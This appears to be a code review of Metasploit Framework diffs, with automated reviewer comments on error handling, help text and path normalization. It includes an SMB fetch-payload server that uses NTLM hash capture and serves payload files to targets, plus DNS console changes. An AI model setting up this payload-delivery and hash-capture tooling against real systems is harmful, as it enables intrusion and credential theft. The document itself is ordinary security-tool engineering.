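Review bot: The header comment kept as context in the first hunk still says the HTTP mixin "imports this, but removes the HTTPS options", while this change reverses the relationship: `Https` now includes `Server::HTTP`, and the HTTP mixin no longer deregisters anything. Update the comment to match, for example `# This mixin adds HTTPS support on top of the HTTP fetch server mixin.` The rest of that comment block lies outside the hunk.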
@@ -0,0 +1,76 @@
|
||||
module Msf::Payload::Adapter::Fetch::Server::SMB
|
||||
|
||||
include ::Msf::Exploit::Remote::SMB::LogAdapter
|
||||
include ::Msf::Exploit::Remote::SMB::Server::HashCapture
|
||||
|
||||
def start_smb_server(srvport, srvhost)
|
||||
vprint_status("Starting SMB server on #{Rex::Socket.to_authority(srvhost, srvport)}")
|
||||
|
||||
log_device = LogDevice::Framework.new(framework)
|
||||
logger = Logger.new(self, log_device)
|
||||
|
||||
ntlm_provider = Msf::Exploit::Remote::SMB::Server::HashCapture::HashCaptureNTLMProvider.new(
|
||||
allow_anonymous: true,
|
||||
allow_guests: true,
|
||||
listener: self,
|
||||
ntlm_type3_status: nil
|
||||
)
|
||||
|
||||
fetch_service = Rex::ServiceManager.start(
|
||||
Rex::Proto::SMB::Server,
|
||||
srvport,
|
||||
srvhost,
|
||||
{
|
||||
'Msf' => framework,
|
||||
'MsfExploit' => self,
|
||||
},
|
||||
_determine_server_comm(srvhost),
|
||||
gss_provider: ntlm_provider,
|
||||
logger: logger
|
||||
)
|
||||
|
||||
fetch_service.on_client_connect_proc = Proc.new { |client|
|
||||
on_client_connect(client)
|
||||
}
|
||||
fetch_service
|
||||
end
|
||||
|
||||
def cleanup_smb_fetch_service(fetch_service)
|
||||
fetch_service.remove_share(@fetch_virtual_disk)
|
||||
fetch_service.deref
|
||||
end
|
||||
|
||||
def fetch_protocol
|
||||
'SMB'
|
||||
end
|
||||
|
||||
def start_smb_fetch_handler(srvport, srvhost, srvuri, srvexe)
|
||||
unless srvuri.include?('\\')
|
||||
raise RuntimeError, 'The srvuri argument must include a share name'
|
||||
end
|
||||
|
||||
share_name, _, share_path = srvuri.partition('\\')
|
||||
|
||||
fetch_service = start_smb_server(srvport, srvhost)
|
||||
if fetch_service.nil?
|
||||
cleanup_handler
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{Rex::Socket.to_authority(srvhost, srvport)}")
|
||||
end
|
||||
|
||||
if fetch_service.shares.key?(share_name)
|
||||
cleanup_smb_fetch_service(fetch_service)
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "The specified SMB share '#{share_name}' already exists.")
|
||||
end
|
||||
|
||||
@fetch_virtual_disk = RubySMB::Server::Share::Provider::VirtualDisk.new(share_name)
|
||||
# the virtual disk expects the path to use the native File::SEPARATOR so normalize on that here
|
||||
@fetch_virtual_disk.add_static_file(share_path, srvexe)
|
||||
fetch_service.add_share(@fetch_virtual_disk)
|
||||
fetch_service
|
||||
end
|
||||
|
||||
def on_client_connect(client)
|
||||
vprint_status("Received SMB connection from #{client.peerhost}")
|
||||
end
|
||||
end
|
||||
|
||||
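Review bot: In `start_smb_fetch_handler`, the share-collision branch calls `cleanup_smb_fetch_service(fetch_service)` before `@fetch_virtual_disk` has been assigned, so `remove_share` receives `nil` (or a disk left from an earlier run) rather than a share this instance added. Release only the reference on that path with `fetch_service.deref`, or guard the removal: `fetch_service.remove_share(@fetch_virtual_disk) if @fetch_virtual_disk`. The comment above `add_static_file` says the path is normalized to `File::SEPARATOR`, but the visible code passes `share_path` through unchanged; either add the normalization or drop the comment. `start_smb_server` has no rescue around `Rex::ServiceManager.start`, so the `fetch_service.nil?` branch is presumably reached only if that call can return nil.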
@@ -1,7 +1,7 @@
|
||||
module Msf::Payload::Adapter::Fetch::Server::TFTP
|
||||
|
||||
def start_tftp_server(srvport, srvhost)
|
||||
vprint_status("Starting TFTP server on #{srvhost}:#{srvport}")
|
||||
vprint_status("Starting TFTP server on #{Rex::Socket.to_authority(srvhost, srvport)}")
|
||||
Rex::Proto::TFTP::Server.new(srvport, srvhost, {})
|
||||
end
|
||||
|
||||
@@ -14,7 +14,7 @@ module Msf::Payload::Adapter::Fetch::Server::TFTP
|
||||
)
|
||||
end
|
||||
def cleanup_tftp_fetch_service(fetch_service)
|
||||
fetch_service.stop unless fetch_service.nil?
|
||||
fetch_service.stop
|
||||
end
|
||||
|
||||
def fetch_protocol
|
||||
@@ -25,7 +25,7 @@ module Msf::Payload::Adapter::Fetch::Server::TFTP
|
||||
fetch_service = start_tftp_server(srvport, srvhost)
|
||||
if fetch_service.nil?
|
||||
cleanup_handler
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch Handler failed to start on #{srvhost}:#{srvport}\n #{e}")
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{srvhost}:#{srvport}\n#{e}")
|
||||
end
|
||||
fetch_service.register_file(srvuri, srvexe, datastore['FETCH_SRVONCE'])
|
||||
fetch_service.start
|
||||
|
||||
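Review bot: The rewritten `fail_with` message in the last hunk still interpolates `#{e}`, but no `e` is bound in the visible `if fetch_service.nil?` branch, so reaching this line would raise `NameError` instead of reporting the start failure. The method begins outside the hunk, so an enclosing `rescue => e` cannot be ruled out. If there is none, drop the interpolation and format the address as the first hunk does: `fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{Rex::Socket.to_authority(srvhost, srvport)}")`. The second hunk also removes the nil guard from `cleanup_tftp_fetch_service`, which is safe only while every caller checks `@fetch_service` first.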
@@ -0,0 +1,42 @@
|
||||
module Msf::Payload::Adapter::Fetch::SMB
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Payload::Adapter
|
||||
include Msf::Payload::Adapter::Fetch
|
||||
include Msf::Payload::Adapter::Fetch::Server::SMB
|
||||
|
||||
|
||||
def initialize(*args)
|
||||
super
|
||||
register_options(
|
||||
[
|
||||
Msf::OptString.new('FETCH_FILENAME', [ true, 'Payload file name to fetch; cannot contain spaces or slashes.', 'test.dll'], regex: /^[^\s\/\\]*$/),
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def fetch_protocol
|
||||
'SMB'
|
||||
end
|
||||
|
||||
def cleanup_handler
|
||||
if @fetch_service
|
||||
cleanup_smb_fetch_service(@fetch_service)
|
||||
@fetch_service = nil
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
def setup_handler
|
||||
@fetch_service = start_smb_fetch_handler(fetch_bindport, fetch_bindhost, srvuri + "\\#{datastore['FETCH_FILENAME']}", @srvexe)
|
||||
super
|
||||
end
|
||||
|
||||
def unc
|
||||
path = "\\\\#{srvhost}"
|
||||
path << "\\#{srvuri.gsub('/', "\\").chomp("\\")}"
|
||||
path << "\\#{datastore['FETCH_FILENAME']}" if datastore['FETCH_FILENAME'].present?
|
||||
path
|
||||
end
|
||||
end
|
||||
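Review bot: `setup_handler` and `unc` build the share path differently: `unc` converts `/` to `\` and strips a trailing `\` from `srvuri`, while `setup_handler` passes `srvuri` through unchanged before appending the file name. With a `srvuri` that contains `/` or ends in `\`, the file is registered under one share and path while the generated UNC path points at another. Derive both from one normalized value, for example `smb_uri = srvuri.gsub('/', "\\").chomp("\\")`, and use it in both methods. `unc` also embeds `srvhost` verbatim, which as far as I know does not yield a valid UNC host name for an IPv6 address.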
@@ -10,7 +10,11 @@ module Msf::Payload::Adapter::Fetch::TFTP
|
||||
end
|
||||
|
||||
def cleanup_handler
|
||||
cleanup_tftp_fetch_service(@fetch_service)
|
||||
if @fetch_service
|
||||
cleanup_tftp_fetch_service(@fetch_service)
|
||||
@fetch_service = nil
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
@@ -19,4 +23,4 @@ module Msf::Payload::Adapter::Fetch::TFTP
|
||||
super
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
@@ -99,7 +99,7 @@ module Msf
|
||||
# @return [Boolean] true if sqlcmd is present
|
||||
def check_sqlcmd
|
||||
result = run_cmd('sqlcmd -?')
|
||||
result =~ /SQL Server Command Line Tool/i
|
||||
result =~ /SQL Server Command Line Tool|Version v\d+/i
|
||||
end
|
||||
|
||||
# Runs a SQL query using the identified command line tool
|
||||
|
||||
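Review bot: `check_sqlcmd` is documented as `@return [Boolean]`, but `=~` returns a match index or `nil`, and the added alternative `Version v\d+` is loose enough to match version banners printed by tools other than sqlcmd. Returning a real boolean is a one-line change: `result.to_s.match?(/SQL Server Command Line Tool|Version v\d+/i)`. A short comment stating which sqlcmd output the second alternative is meant to match would keep the pattern from being tightened or widened by mistake later.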
@@ -74,7 +74,9 @@ module Msf
|
||||
#
|
||||
# Default cleanup handler does nothing
|
||||
#
|
||||
def cleanup; end
|
||||
def cleanup
|
||||
super if defined?(super)
|
||||
end
|
||||
|
||||
#
|
||||
# Return the associated session or nil if there isn't one
|
||||
@@ -188,7 +190,7 @@ module Msf
|
||||
|
||||
# Can't be compatible if it's the wrong type
|
||||
if session_types && !session_types.include?(s.type)
|
||||
issues << "incompatible session type: #{s.type}"
|
||||
issues << "incompatible session type: #{s.type}. This module works with: #{session_types.join(', ')}."
|
||||
end
|
||||
|
||||
# Check to make sure architectures match
|
||||
@@ -208,9 +210,9 @@ module Msf
|
||||
|
||||
if platform && platform.is_a?(Msf::Module::PlatformList) && !platform.empty?
|
||||
if s.platform.blank?
|
||||
issues << 'Unknown session platform'
|
||||
issues << "Unknown session platform. This module works with: #{platform.names.join(', ')}."
|
||||
elsif !platform.supports?(Msf::Module::PlatformList.transform(s.platform))
|
||||
issues << "incompatible session platform: #{s.platform}"
|
||||
issues << "incompatible session platform: #{s.platform}. This module works with: #{platform.names.join(', ')}."
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
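Review bot: The comment above `cleanup` still reads "Default cleanup handler does nothing", but the new body calls `super if defined?(super)`, so it now runs whatever `cleanup` the next ancestor defines. Reword it, for example `# Default cleanup handler; delegates to the next cleanup in the ancestor chain, if any`. In the last hunk `platform.names.join(', ')` is built in two branches; a local such as `supported = platform.names.join(', ')` would keep the two messages in step.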
@@ -423,15 +423,6 @@ class Db
|
||||
[ '-C', '--columns-until-restart' ] => [ true, 'Only show the given columns until the next restart (see list below)', '<columns>' ],
|
||||
)
|
||||
|
||||
def cmd_hosts_help(default_columns)
|
||||
print_line "Usage: hosts [ options ] [addr1 addr2 ...]"
|
||||
print_line
|
||||
print @@hosts_opts.usage
|
||||
print_line
|
||||
print_line "Available columns: #{default_columns.join(", ")}"
|
||||
print_line
|
||||
end
|
||||
|
||||
def cmd_hosts(*args)
|
||||
return unless active?
|
||||
onlyup = false
|
||||
@@ -487,7 +478,12 @@ class Db
|
||||
@@hosts_opts.parse(args) do |opt, idx, val|
|
||||
case opt
|
||||
when '-h', '--help'
|
||||
cmd_hosts_help(default_columns)
|
||||
print_line "Usage: hosts [ options ] [addr1 addr2 ...]"
|
||||
print_line
|
||||
print @@hosts_opts.usage
|
||||
print_line
|
||||
print_line "Available columns: #{default_columns.join(", ")}"
|
||||
print_line
|
||||
return
|
||||
when '-a', '--add'
|
||||
mode << :add
|
||||
@@ -698,12 +694,12 @@ class Db
|
||||
[]
|
||||
end
|
||||
|
||||
def cmd_services_help(default_columns)
|
||||
def cmd_services_help
|
||||
print_line "Usage: services [-h] [-u] [-a] [-r <proto>] [-p <port1,port2>] [-s <name1,name2>] [-o <filename>] [addr1 addr2 ...]"
|
||||
print_line
|
||||
print @@services_opts.usage
|
||||
print_line
|
||||
print_line "Available columns: #{default_columns.join(", ")}"
|
||||
print_line "Available columns: #{@@services_columns.join(", ")}"
|
||||
print_line
|
||||
end
|
||||
|
||||
@@ -918,7 +914,7 @@ class Db
|
||||
search_term = val
|
||||
opts[:search_term] = search_term
|
||||
when '-h', '--help'
|
||||
cmd_services_help(@@services_columns)
|
||||
cmd_services_help
|
||||
return
|
||||
else
|
||||
# Anything that wasn't an option is a host to search for
|
||||
|
||||
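Review bot: Removing `cmd_hosts_help` in the first hunk and inlining its body under `-h` leaves `hosts` without a help method, while `services` keeps `cmd_services_help`. If the console's `help <command>` lookup relies on `cmd_<name>_help` methods (the dispatcher is not visible here), `help hosts` would stop printing usage. Keeping the helper and calling it from the `-h` branch preserves both paths. `cmd_services_help` no longer accepts a parameter, so any caller still passing one would raise `ArgumentError`; only one call site is visible in this section.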
@@ -9,13 +9,32 @@ class DNS
|
||||
|
||||
include Msf::Ui::Console::CommandDispatcher
|
||||
|
||||
ADD_USAGE = 'dns [add] [--index <insertion index>] [--rule <wildcard DNS entry>] [--session <session id>] <resolver> ...'.freeze
|
||||
@@add_opts = Rex::Parser::Arguments.new(
|
||||
['-r', '--rule'] => [true, 'Set a DNS wildcard entry to match against' ],
|
||||
['-s', '--session'] => [true, 'Force the DNS request to occur over a particular channel (override routing rules)' ],
|
||||
['-i', '--index'] => [true, 'Index to insert at'],
|
||||
['-r', '--rule'] => [true, 'Set a DNS wildcard entry to match against'],
|
||||
['-s', '--session'] => [true, 'Force the DNS request to occur over a particular channel (override routing rules)']
|
||||
)
|
||||
|
||||
ADD_STATIC_USAGE = 'dns [add-static] <hostname> <IP address> ...'.freeze
|
||||
|
||||
REMOVE_USAGE = 'dns [remove/del] -i <entry id> [-i <entry id> ...]'.freeze
|
||||
@@remove_opts = Rex::Parser::Arguments.new(
|
||||
['-i'] => [true, 'Index to remove']
|
||||
['-i', '--index'] => [true, 'Index to remove at']
|
||||
)
|
||||
|
||||
REMOVE_STATIC_USAGE = 'dns [remove-static] <hostname> [<IP address> ...]'.freeze
|
||||
|
||||
RESET_CONFIG_USAGE = 'dns [reset-config] [-y/--yes] [--system]'.freeze
|
||||
@@reset_config_opts = Rex::Parser::Arguments.new(
|
||||
['-y', '--yes'] => [false, 'Assume yes and do not prompt for confirmation before resetting'],
|
||||
['--system'] => [false, 'Include the system resolver']
|
||||
)
|
||||
|
||||
RESOLVE_USAGE = 'dns [resolve] [-f <address family>] <hostname> ...'.freeze
|
||||
@@resolve_opts = Rex::Parser::Arguments.new(
|
||||
# same usage syntax as Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Stdapi
|
||||
['-f'] => [true, 'Address family - IPv4 or IPv6 (default IPv4)']
|
||||
)
|
||||
|
||||
def initialize(driver)
|
||||
@@ -31,7 +50,7 @@ class DNS
|
||||
|
||||
if framework.features.enabled?(Msf::FeatureManager::DNS_FEATURE)
|
||||
commands = {
|
||||
'dns' => "Manage Metasploit's DNS resolving behaviour"
|
||||
'dns' => "Manage Metasploit's DNS resolving behaviour"
|
||||
}
|
||||
end
|
||||
commands
|
||||
@@ -46,16 +65,13 @@ class DNS
|
||||
def cmd_dns_tabs(str, words)
|
||||
return if driver.framework.dns_resolver.nil?
|
||||
|
||||
subcommands = %w[ add add-static delete flush-cache flush-entries flush-static help print query remove remove-static reset-config resolve ]
|
||||
if words.length == 1
|
||||
options = ['add','del','remove','purge','print']
|
||||
return options.select { |opt| opt.start_with?(str) }
|
||||
return subcommands.select { |opt| opt.start_with?(str) }
|
||||
end
|
||||
|
||||
cmd = words[1]
|
||||
case cmd
|
||||
when 'purge','print'
|
||||
# These commands don't have any arguments
|
||||
return
|
||||
when 'add'
|
||||
# We expect a repeating pattern of tag (e.g. -r) and then a value (e.g. *.metasploit.com)
|
||||
# Once this pattern is violated, we're just specifying DNS servers at that point.
|
||||
@@ -63,19 +79,19 @@ class DNS
|
||||
if words.length > 2
|
||||
words[2..-1].each do |word|
|
||||
if tag_is_expected && !word.start_with?('-')
|
||||
return # They're trying to specify a DNS server - we can't help them from here on out
|
||||
return
|
||||
end
|
||||
tag_is_expected = !tag_is_expected
|
||||
end
|
||||
end
|
||||
|
||||
case words[-1]
|
||||
when '-s', '--session'
|
||||
session_ids = driver.framework.sessions.keys.map { |k| k.to_s }
|
||||
return session_ids.select { |id| id.start_with?(str) }
|
||||
when '-r', '--rule'
|
||||
# Hard to auto-complete a rule with any meaningful value; just return
|
||||
return
|
||||
when '-s', '--session'
|
||||
session_ids = driver.framework.sessions.keys.map { |k| k.to_s }
|
||||
return session_ids.select { |id| id.start_with?(str) }
|
||||
when /^-/
|
||||
# Unknown tag
|
||||
return
|
||||
@@ -84,53 +100,85 @@ class DNS
|
||||
options = @@add_opts.option_keys.select { |opt| opt.start_with?(str) }
|
||||
options << '' # Prevent tab-completion of a dash, given they could provide an IP address at this point
|
||||
return options
|
||||
when 'del','remove'
|
||||
when 'add-static'
|
||||
if words.length == 2
|
||||
# tab complete existing hostnames because they can have more than one IP address
|
||||
return resolver.static_hostnames.each.select { |hostname,_| hostname.downcase.start_with?(str.downcase) }.map { |hostname,_| hostname }
|
||||
end
|
||||
when 'help'
|
||||
# These commands don't have any arguments
|
||||
return subcommands.select { |sc| sc.start_with?(str) }
|
||||
when 'remove','delete'
|
||||
if words[-1] == '-i'
|
||||
ids = driver.framework.dns_resolver.nameserver_entries.flatten.map { |entry| entry[:id].to_s }
|
||||
return ids.select { |id| id.start_with? str }
|
||||
return
|
||||
else
|
||||
return @@remove_opts.option_keys.select { |opt| opt.start_with?(str) }
|
||||
end
|
||||
when 'remove-static'
|
||||
if words.length == 2
|
||||
return resolver.static_hostnames.each.select { |hostname,_| hostname.downcase.start_with?(str.downcase) }.map { |hostname,_| hostname }
|
||||
elsif words.length > 2
|
||||
hostname = words[2]
|
||||
ip_addresses = resolver.static_hostnames.get(hostname, Dnsruby::Types::A) + resolver.static_hostnames.get(hostname, Dnsruby::Types::AAAA)
|
||||
return ip_addresses.map(&:to_s).select { |ip_address| ip_address.start_with?(str) }
|
||||
end
|
||||
when 'reset-config'
|
||||
@@reset_config_opts.option_keys.select { |opt| opt.start_with?(str) }
|
||||
when 'resolve','query'
|
||||
if words[-1] == '-f'
|
||||
families = %w[ IPv4 IPv6 ] # The family argument is case-insensitive
|
||||
return families.select { |family| family.downcase.start_with?(str.downcase) }
|
||||
else
|
||||
@@resolve_opts.option_keys.select { |opt| opt.start_with?(str) }
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def cmd_dns_help
|
||||
def cmd_dns_help(*args)
|
||||
if args.first.present?
|
||||
handler = "#{args.first.gsub('-', '_')}_dns"
|
||||
if respond_to?("#{handler}_help")
|
||||
# if it is a valid command with dedicated help information
|
||||
return send("#{handler}_help")
|
||||
elsif respond_to?(handler)
|
||||
# if it is a valid command without dedicated help information
|
||||
print_error("No help menu is available for #{args.first}")
|
||||
return
|
||||
else
|
||||
print_error("Invalid subcommand: #{args.first}")
|
||||
end
|
||||
end
|
||||
|
||||
print_line "Manage Metasploit's DNS resolution behaviour"
|
||||
print_line
|
||||
print_line "Usage:"
|
||||
print_line " dns [add] [--session <session_id>] [--rule <wildcard DNS entry>] <IP Address> <IP Address> ..."
|
||||
print_line " dns [remove/del] -i <entry id> [-i <entry id> ...]"
|
||||
print_line " dns [purge]"
|
||||
print_line "USAGE:"
|
||||
print_line " #{ADD_USAGE}"
|
||||
print_line " #{ADD_STATIC_USAGE}"
|
||||
print_line " #{REMOVE_USAGE}"
|
||||
print_line " #{REMOVE_STATIC_USAGE}"
|
||||
print_line " dns [flush-cache]"
|
||||
print_line " dns [flush-entries]"
|
||||
print_line " dns [flush-static]"
|
||||
print_line " dns [print]"
|
||||
print_line " #{RESET_CONFIG_USAGE}"
|
||||
print_line " #{RESOLVE_USAGE}"
|
||||
print_line " dns [help] [subcommand]"
|
||||
print_line
|
||||
print_line "Subcommands:"
|
||||
print_line " add - add a DNS resolution entry to resolve certain domain names through a particular DNS server"
|
||||
print_line " remove - delete a DNS resolution entry; 'del' is an alias"
|
||||
print_line " purge - remove all DNS resolution entries"
|
||||
print_line " print - show all active DNS resolution entries"
|
||||
print_line "SUBCOMMANDS:"
|
||||
print_line " add - Add a DNS resolution entry to resolve certain domain names through a particular DNS resolver"
|
||||
print_line " add-static - Add a statically defined hostname"
|
||||
print_line " flush-cache - Remove all cached DNS answers"
|
||||
print_line " flush-entries - Remove all configured DNS resolution entries"
|
||||
print_line " flush-static - Remove all statically defined hostnames"
|
||||
print_line " print - Show all configured DNS resolution entries"
|
||||
print_line " remove - Delete a DNS resolution entry"
|
||||
print_line " remove-static - Delete a statically defined hostname"
|
||||
print_line " reset-config - Reset the DNS configuration"
|
||||
print_line " resolve - Resolve a hostname"
|
||||
print_line
|
||||
print_line "Examples:"
|
||||
print_line " Display all current DNS nameserver entries"
|
||||
print_line " dns"
|
||||
print_line " dns print"
|
||||
print_line
|
||||
print_line " Set the DNS server(s) to be used for *.metasploit.com to 192.168.1.10"
|
||||
print_line " route add --rule *.metasploit.com 192.168.1.10"
|
||||
print_line
|
||||
print_line " Add multiple entries at once"
|
||||
print_line " route add --rule *.metasploit.com --rule *.google.com 192.168.1.10 192.168.1.11"
|
||||
print_line
|
||||
print_line " Set the DNS server(s) to be used for *.metasploit.com to 192.168.1.10, but specifically to go through session 2"
|
||||
print_line " route add --session 2 --rule *.metasploit.com 192.168.1.10"
|
||||
print_line
|
||||
print_line " Delete the DNS resolution rule with ID 3"
|
||||
print_line " route remove -i 3"
|
||||
print_line
|
||||
print_line " Delete multiple entries in one command"
|
||||
print_line " route remove -i 3 -i 4 -i 5"
|
||||
print_line
|
||||
print_line " Set the DNS server(s) to be used for all requests that match no rules"
|
||||
print_line " route add 8.8.8.8 8.8.4.4"
|
||||
print_line "EXAMPLES:"
|
||||
print_line " Display help information for the 'add' subcommand"
|
||||
print_line " dns help add"
|
||||
print_line
|
||||
end
|
||||
|
||||
@@ -143,7 +191,14 @@ class DNS
|
||||
args << 'print' if args.length == 0
|
||||
# Short-circuit help
|
||||
if args.delete("-h") || args.delete("--help")
|
||||
cmd_dns_help
|
||||
subcommand = args.first
|
||||
if subcommand && respond_to?("#{subcommand.gsub('-', '_')}_dns_help")
|
||||
# if it is a valid command with dedicated help information
|
||||
send("#{subcommand.gsub('-', '_')}_dns_help")
|
||||
else
|
||||
# otherwise print the top-level help information
|
||||
cmd_dns_help
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
@@ -152,14 +207,26 @@ class DNS
|
||||
case action
|
||||
when "add"
|
||||
add_dns(*args)
|
||||
when "remove", "del"
|
||||
remove_dns(*args)
|
||||
when "purge"
|
||||
purge_dns
|
||||
when "add-static"
|
||||
add_static_dns(*args)
|
||||
when "flush-entries"
|
||||
flush_entries_dns
|
||||
when "flush-cache"
|
||||
flush_cache_dns
|
||||
when "flush-static"
|
||||
flush_static_dns
|
||||
when "help"
|
||||
cmd_dns_help(*args)
|
||||
when "print"
|
||||
print_dns
|
||||
when "help"
|
||||
cmd_dns_help
|
||||
when "remove", "rm", "delete", "del"
|
||||
remove_dns(*args)
|
||||
when "remove-static"
|
||||
remove_static_dns(*args)
|
||||
when "reset-config"
|
||||
reset_config_dns(*args)
|
||||
when "resolve", "query"
|
||||
resolve_dns(*args)
|
||||
else
|
||||
print_error("Invalid command. To view help: dns -h")
|
||||
end
|
||||
@@ -169,19 +236,27 @@ class DNS
|
||||
end
|
||||
|
||||
def add_dns(*args)
|
||||
rules = []
|
||||
rules = ['*']
|
||||
first_rule = true
|
||||
comm = nil
|
||||
servers = []
|
||||
resolvers = []
|
||||
index = -1
|
||||
@@add_opts.parse(args) do |opt, idx, val|
|
||||
unless servers.empty? || opt.nil?
|
||||
unless resolvers.empty? || opt.nil?
|
||||
raise ::ArgumentError.new("Invalid command near #{opt}")
|
||||
end
|
||||
case opt
|
||||
when '--rule', '-r'
|
||||
when '-i', '--index'
|
||||
raise ::ArgumentError.new("Not a valid index: #{val}") unless val.to_i > 0
|
||||
|
||||
index = val.to_i - 1
|
||||
when '-r', '--rule'
|
||||
raise ::ArgumentError.new('No rule specified') if val.nil?
|
||||
|
||||
rules.clear if first_rule # if the user defines even one rule, clear the defaults
|
||||
first_rule = false
|
||||
rules << val
|
||||
when '--session', '-s'
|
||||
when '-s', '--session'
|
||||
if val.nil?
|
||||
raise ::ArgumentError.new('No session specified')
|
||||
end
|
||||
@@ -192,42 +267,179 @@ class DNS
|
||||
|
||||
comm = val
|
||||
when nil
|
||||
servers << val
|
||||
resolvers << val
|
||||
else
|
||||
raise ::ArgumentError.new("Unknown flag: #{opt}")
|
||||
end
|
||||
end
|
||||
|
||||
# The remaining args should be the DNS servers
|
||||
|
||||
if servers.length < 1
|
||||
raise ::ArgumentError.new("You must specify at least one DNS server")
|
||||
if resolvers.length < 1
|
||||
raise ::ArgumentError.new('You must specify at least one upstream DNS resolver')
|
||||
end
|
||||
|
||||
servers.each do |host|
|
||||
unless Rex::Socket.is_ip_addr?(host)
|
||||
raise ::ArgumentError.new("Invalid DNS server: #{host}")
|
||||
resolvers.each do |resolver|
|
||||
unless Rex::Proto::DNS::UpstreamRule.valid_resolver?(resolver)
|
||||
raise ::ArgumentError.new("Invalid DNS resolver: #{resolver}")
|
||||
end
|
||||
end
|
||||
|
||||
comm_obj = nil
|
||||
|
||||
unless comm.nil?
|
||||
raise ::ArgumentError.new("Not a valid number: #{comm}") unless comm =~ /^\d+$/
|
||||
comm_int = comm.to_i
|
||||
raise ::ArgumentError.new("Session does not exist: #{comm}") unless driver.framework.sessions.include?(comm_int)
|
||||
comm_obj = driver.framework.sessions[comm_int]
|
||||
raise ::ArgumentError.new("Not a valid session: #{comm}") unless comm =~ /\A-?[0-9]+\Z/
|
||||
|
||||
comm_obj = driver.framework.sessions.get(comm.to_i)
|
||||
raise ::ArgumentError.new("Session does not exist: #{comm}") unless comm_obj
|
||||
raise ::ArgumentError.new("Socket Comm (Session #{comm}) does not implement Rex::Socket::Comm") unless comm_obj.is_a? ::Rex::Socket::Comm
|
||||
|
||||
if resolvers.any? { |resolver| SPECIAL_RESOLVERS.include?(resolver.downcase) }
|
||||
print_warning("The session argument will be ignored for the system resolver")
|
||||
end
|
||||
end
|
||||
|
||||
rules.each do |rule|
|
||||
rules.each_with_index do |rule, offset|
|
||||
print_warning("DNS rule #{rule} does not contain wildcards, so will not match subdomains") unless rule.include?('*')
|
||||
driver.framework.dns_resolver.add_upstream_rule(
|
||||
resolvers,
|
||||
comm: comm_obj,
|
||||
wildcard: rule,
|
||||
index: (index == -1 ? -1 : offset + index)
|
||||
)
|
||||
end
|
||||
|
||||
# Split each DNS server entry up into a separate entry
|
||||
servers.each do |server|
|
||||
driver.framework.dns_resolver.add_nameserver(rules, server, comm_obj)
|
||||
print_good("#{rules.length} DNS #{rules.length > 1 ? 'entries' : 'entry'} added")
|
||||
end
|
||||
|
||||
def add_dns_help
|
||||
print_line "USAGE:"
|
||||
print_line " #{ADD_USAGE}"
|
||||
print_line @@add_opts.usage
|
||||
print_line "RESOLVERS:"
|
||||
print_line " ipv4 / ipv6 address - The IP address of an upstream DNS server to resolve from"
|
||||
print_line " blackhole - Drop all queries"
|
||||
print_line " static - Reply with statically configured addresses (only for A/AAAA records)"
|
||||
print_line " system - Use the host operating systems DNS resolution functionality (only for A/AAAA records)"
|
||||
print_line
|
||||
print_line "EXAMPLES:"
|
||||
print_line " Set the DNS server(s) to be used for *.metasploit.com to 192.168.1.10"
|
||||
print_line " dns add --rule *.metasploit.com 192.168.1.10"
|
||||
print_line
|
||||
print_line " Add multiple entries at once"
|
||||
print_line " dns add --rule *.metasploit.com --rule *.google.com 192.168.1.10 192.168.1.11"
|
||||
print_line
|
||||
print_line " Set the DNS server(s) to be used for *.metasploit.com to 192.168.1.10, but specifically to go through session 2"
|
||||
print_line " dns add --session 2 --rule *.metasploit.com 192.168.1.10"
|
||||
end
|
||||
|
||||
def add_static_dns(*args)
|
||||
if args.length < 2
|
||||
raise ::ArgumentError.new('A hostname and IP address must be provided')
|
||||
end
|
||||
print_good("#{servers.length} DNS #{servers.length > 1 ? 'entries' : 'entry'} added")
|
||||
|
||||
hostname = args.shift
|
||||
if !Rex::Proto::DNS::StaticHostnames.is_valid_hostname?(hostname)
|
||||
raise ::ArgumentError.new("Invalid hostname: #{hostname}")
|
||||
end
|
||||
|
||||
ip_addresses = args
|
||||
if (ip_address = ip_addresses.find { |a| !Rex::Socket.is_ip_addr?(a) })
|
||||
raise ::ArgumentError.new("Invalid IP address: #{ip_address}")
|
||||
end
|
||||
|
||||
ip_addresses.each do |ip_address|
|
||||
resolver.static_hostnames.add(hostname, ip_address)
|
||||
print_status("Added static hostname mapping #{hostname} to #{ip_address}")
|
||||
end
|
||||
end
|
||||
|
||||
def add_static_dns_help
|
||||
print_line "USAGE:"
|
||||
print_line " #{ADD_STATIC_USAGE}"
|
||||
print_line
|
||||
print_line "EXAMPLES:"
|
||||
print_line " Define a static entry mapping localhost6 to ::1"
|
||||
print_line " dns add-static localhost6 ::1"
|
||||
end
|
||||
|
||||
#
|
||||
# Query a hostname using the configuration. This is useful for debugging and
|
||||
# inspecting the active settings.
|
||||
#
|
||||
def resolve_dns(*args)
|
||||
names = []
|
||||
query_type = Dnsruby::Types::A
|
||||
|
||||
@@resolve_opts.parse(args) do |opt, idx, val|
|
||||
unless names.empty? || opt.nil?
|
||||
raise ::ArgumentError.new("Invalid command near #{opt}")
|
||||
end
|
||||
case opt
|
||||
when '-f'
|
||||
case val.downcase
|
||||
when 'ipv4'
|
||||
query_type = Dnsruby::Types::A
|
||||
when'ipv6'
|
||||
query_type = Dnsruby::Types::AAAA
|
||||
else
|
||||
raise ::ArgumentError.new("Invalid family: #{val}")
|
||||
end
|
||||
when nil
|
||||
names << val
|
||||
else
|
||||
raise ::ArgumentError.new("Unknown flag: #{opt}")
|
||||
end
|
||||
end
|
||||
|
||||
if names.length < 1
|
||||
raise ::ArgumentError.new('You must specify at least one hostname to resolve')
|
||||
end
|
||||
|
||||
tbl = Table.new(
|
||||
Table::Style::Default,
|
||||
'Header' => 'Host resolutions',
|
||||
'Prefix' => "\n",
|
||||
'Postfix' => "\n",
|
||||
